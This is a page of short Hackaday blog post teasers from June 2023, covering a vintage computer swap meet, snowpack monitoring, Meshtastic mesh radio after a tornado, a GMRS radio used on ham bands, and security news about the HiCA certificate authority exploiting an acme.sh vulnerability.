VCF’s Swap Meet Experiment Helps Support Expansion

June 29, 2023 by 13 Comments

There was a time when those looking for tech bargains had to either try their luck at the local flea market, or make the pilgrimage out to a dedicated swap meet. But with the rise of websites like eBay and Craigslist these parking lot meetups started to fall out of favor, to the point that they became all but extinct over the last couple decades.

So there was some risk involved when the Vintage Computer Federation decided to dust off the concept as a way of sidestepping New Jersey’s COVID-era limitations on indoor meetups. But as VCF Vice President [Jeffrey Brace] explained during our visit earlier this month, the experiment has more than paid off. Each swap meet has brought in buyers and sellers from all over the Mid–Atlantic region, helping to not only raise money for the VCF’s ongoing preservation efforts, but spread awareness of the organization and their goals.

The VCF hopes to expand their existing museum.

During our chat, [Jeffrey] goes over the origins and growth of the VCF swap meet, and how it compares to their annual Vintage Computer Festival. He also speaks about the Federation’s desire to expand their already impressive museum space into a far larger climate-controlled area that will allow for even more classic computer hardware to be put on display.

We visited the VCF swap meet back in 2021, and came away with the distinct impression that [Jeffrey] and the rest of the team had a winning idea on their hands. We’re happy to report that as of 2023 the areas where we saw room for improvement — namely the lack of on-site refreshment and a somewhat overly narrow focus on vintage hardware — have both been addressed. In its current form, this is truly a must-see event for anyone with an interest in computers, radio, or even just general electronics who happens to live within driving distance of the Jersey shore.

While eBay certainly makes it easy to bid on a piece of gear, you’re unlikely to make a new friend while doing so. Events like this are more than just a way to buy and sell hardware, but provide a chance for like-minded individuals to connect and build a community. We’re glad to see the event grow larger each year, and hope it inspires similar revivals elsewhere.

Continue reading “VCF’s Swap Meet Experiment Helps Support Expansion”

Know Snow: Monitoring Snowpack With The SNOTEL Network

June 29, 2023 by 12 Comments

With summer just underway here in North America, it may seem like a strange time to talk about snow. But when you live in North Idaho, winter is never very far away and is always very much on everyone’s mind. Our summers are fierce but all too brief, so starting around September, most of us begin to cast a wary eye at the peaks of the Bitterroot range in the mornings, looking for the first signs of snow. And in the late spring, we do much the same, except longingly looking for the first signs that the snowpack is finally breaking up.

We all know how important snow is, of course. Snow is our lifeline, nearly the only source of drinking water we have here, as well as the foundation of our outdoor recreation industries. We also know that the snowpack determines our risk for wildfires, so while the long, dark winters may take a psychological toll, the longer the snow stays on the mountains, the less chance we have of burning come summer.

These are all very subjective measures, though, and there’s way too much riding on the snowpack to leave it up to casual observation. To make things more quantitative, the US Department of Agriculture’s Natural Resources Conservation Service (NRCS) has built a system across the western US that measures the snowpack in real-time, and provides invaluable data to climatologists, fish and game managers, farmers, and even the recreation industry, all of whom have a vested interest in the water held within. The network is called SNOTEL, and I recently got a chance to take a field trip with a hydrologist and get an up-close look at how it works.

Continue reading “Know Snow: Monitoring Snowpack With The SNOTEL Network”

Meshtastic For The Greater Good

June 26, 2023 by 62 Comments

Last week, my city was hit by a tornado. That’s not surprising here in Oklahoma, and thankfully this event was an F0 or possibly even an EF0 — a really weak tornado. Only a couple roofs collapsed, though probably half the houses in town are going to need roof repairs, thanks to the combination of huge hail and high winds. While it wasn’t too bad, power did go down in a few places around town, and this led to an interesting series of events.

Chat messages were coming in like this: “That was a [power] flicker, yeah. Even took down my Internet.” Followed by “Whee, [fiber Internet] got knocked out and now Starlink has too many clouds in the way.” And after ten minutes of silence, we got a bit worried to see “Time to hide under a bed. … Is cell service back?” It is a bit spooky to think about trying to help neighbors and friends after a disaster, in the midst of the communication breakdown that often follows. If he had needed help, and had no working communications, how long would it have taken for us to go check on him?
Continue reading “Meshtastic For The Greater Good”

Hackaday Links Column Banner

Hackaday Links: June 25, 2023

June 25, 2023 by 15 Comments

Is it really a dystopian future if the robots are radio-controlled? That’s what came to mind reading this article on a police robot out of Singapore, complete with a breathless headline invoking Black Mirror, which is now apparently the standard by which all dystopias are to be judged. Granted, the episode with the robo-dogs was pretty terrifying, but it seems like the Singapore Police Force has a way to go before getting to that level. The bot, which has been fielded at Changi Airport after extensive testing and seems to be completely remote-controlled, is little more than a beefy telepresence robot. At 5.5 feet (1.7 meters) tall, the bot isn’t terribly imposing, although it apparently has a mast that can be jacked up another couple of feet, plus there are lights, sirens, and speakers that can get the message across. Plus cameras, of course; there are always cameras. The idea is to provide extra eyes to supplement foot patrols, plus the potential to cordon off an incident until meatspace officers arrive. The buzzword game here is weak, though; there’s no mention of AI or machine learning at all. We have a feeling that when the robots finally rise up, ones like this will be left serving the drinks.

Continue reading “Hackaday Links: June 25, 2023”

Ham Pairs Nicely With GMRS

June 17, 2023 by 37 Comments

Ignoring all of the regulations, band allocations, and “best amateur practices,” there’s no real fundamental difference between the frequencies allocated to the Family Radio Service (FRS), the General Mobile Radio Service (GMRS), the Multi-Use Radio Service (MURS), and the two-meter and 70-centimeter bands allocated to licensed ham radio operators. The radio waves propagate over relatively short distances, don’t typically experience any skip, and are used for similar activities. The only major difference between these (at least in the Americas or ITU region 2) is the licenses you must hold to operate on the specific bands. This means that even though radios are prohibited by rule from operating across these bands, it’s often not too difficult to find radios that will do it anyway.

[Greg], aka [K4HSM], was experimenting with a TIDRADIO H8 meant for GMRS, which in North America is a service used for short-range two-way communication. No exams are required, but a license is still needed. GMRS also allows for the use of repeaters, making it more effective than the unlicensed FRS. GMRS radios, this one included, often can receive or scan frequencies they can’t transmit on, but in this case, the limits on transmitting are fairly easy to circumvent. While it isn’t allowed when programming the radio over Bluetooth, [K4HSM] found that programming it from the keypad directly will allow transmitting on the ham bands and uses it to contact his local two-meter and 70-cm repeaters as a proof-of-concept.

The surprising thing about this isn’t so much that the radio is physically capable of operating this way. What’s surprising is that this takes basically no physical modifications at all, and as far as we can tell, that violates at least one FCC rule. Whether or not that rule makes any sense is up for debate, and it’s not likely the FCC will break down your door for doing this since they have bigger fish to fry, but we’d definitely caution that it’s not technically legal to operate this way.

Continue reading “Ham Pairs Nicely With GMRS”

This Week In Security: ACME.sh, Leaking LEDs, And Android Apps

June 16, 2023 by 3 Comments

Let’s Encrypt has made an enormous difference to the landscape of the web. The protocol used for authenticating and receiving certificates, ACME, has spawned quite a few clients of various flavors. Some are written in Rust, some in Python or Go, and a few in straight Bash shell script. One of those last ones, acme.sh, was doing something odd when talking to a particular “Certificate Authority”, HiCA. This pseudo-CA only supports acme.sh, and now we know why. The folks behind HiCA found an RCE exploit in acme.sh, and decided to use that exploit to do certificate issuance with more “flexability”. Oof.

The nuts and bolts here is that HiCA was working as a CA-in-the-Middle, wrapping other CA’s authentication services. Those services don’t support ACME authentication at all, and HiCA used the acme.sh vulnerability to put the authentication token in the place SSL.com expected to find it. So, just a good community member offering a service that ACME doesn’t quite support, right?

Well, maybe not so innocent. The way it appears this works, is that the end user sends a certificate request to HiCA. HiCA takes that information, and initiates a certificate request off to SSL.com. SSL.com sends back a challenge, and HiCA embeds that challenge in the RCE and sends it to the end user. The end user’s machine triggers the RCE, which pushes the challenge token to the well-known location, and bypasses the ACME protection against exactly this sort of CA-in-the-middle situation.

The last piece of the authentication process is that the signing server reaches out over HTTP to the domain being signed, and looks for the token to be there. Once found, it sends the signed certificates to HiCA, who then forward them on to the end user. And that’s the problem. HiCA has access to the key of every SSL cert they handled. This doesn’t allow encryption, but these keys could be used to impersonate or even launch MitM attacks against those domains. There’s no evidence that HiCA was actually capturing or using those keys, but this company was abusing an RCE to put itself in the position to have that ability.

The takeaway is twofold. First, as an end user, only use reputable CAs. And second, ACME clients need to be hardened against potentially malicious CAs. The fact that HiCA only supported the one ACME client was what led to this discovery, and should have been a warning flag to anyone using the service. Continue reading “This Week In Security: ACME.sh, Leaking LEDs, And Android Apps”

The Simplest Social Engineering Hack Of Them All

June 15, 2023 by 62 Comments

Here at Hackaday we cover news and interesting features for the hacker community, with an emphasis more on the hardware side. Nevertheless we also cover stories from time to time from the broader world of security. These usually involve vulnerabilities discovered through the patient work of software or hardware researchers, and are certainly what we’d call hacking. But what about those information security breaches that aren’t hacks like that at all? What happens when the person being breached simply gives you the information?

I’ve got one, and while it’s Not A Hack, it’s definitely something that we and those outside our community need to talk about. I’m talking about the depressingly common occurrence of organisations who should know better, gifting their letterhead to all and sundry in the form of freely editable Word documents. Continue reading “The Simplest Social Engineering Hack Of Them All”